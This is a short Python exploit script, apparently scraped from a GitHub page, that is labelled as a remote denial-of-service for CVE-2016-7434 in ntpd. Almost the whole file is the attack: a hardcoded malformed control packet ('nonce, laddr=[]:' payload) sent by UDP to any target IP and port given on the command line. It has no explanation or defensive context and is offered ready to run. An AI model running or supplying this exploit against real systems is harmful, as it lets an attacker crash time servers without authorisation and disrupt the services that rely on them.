Permalink
Find file
Fetching contributors…
Cannot retrieve contributors at this time
executable file 34 lines (27 sloc) 1.26 KB
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CVE-2016-7434 ntpd remote DOS by opsxcq (github.com/opsxcq/)
"""
from sys import argv, exit
import socket
from argparse import ArgumentParser
def exploit(target, port):
"""CVE-2016-7434 exploit"""
buffer="\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
# Create a datagram socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buffer, (target, port))
print("[+] Exploit sent, please test the target\n")
if __name__ == "__main__":
ap = ArgumentParser(description="CVE-2016-7434 ntpd remote DOS")
ap.add_argument("-t", "--target", required=True, help="Target's IP address")
ap.add_argument("-p", "--port", required=False, type=int, help="port where ntpd is running")
args = vars(ap.parse_args())
try:
print("[*] Starting CVE-2016-7434 ntpd remote DOS")
exploit(args["target"], args["port"])
except IOError:
exit("[!] Error sending packets")
except KeyboardInterrupt:
print("\n[*] Stopping the exploit")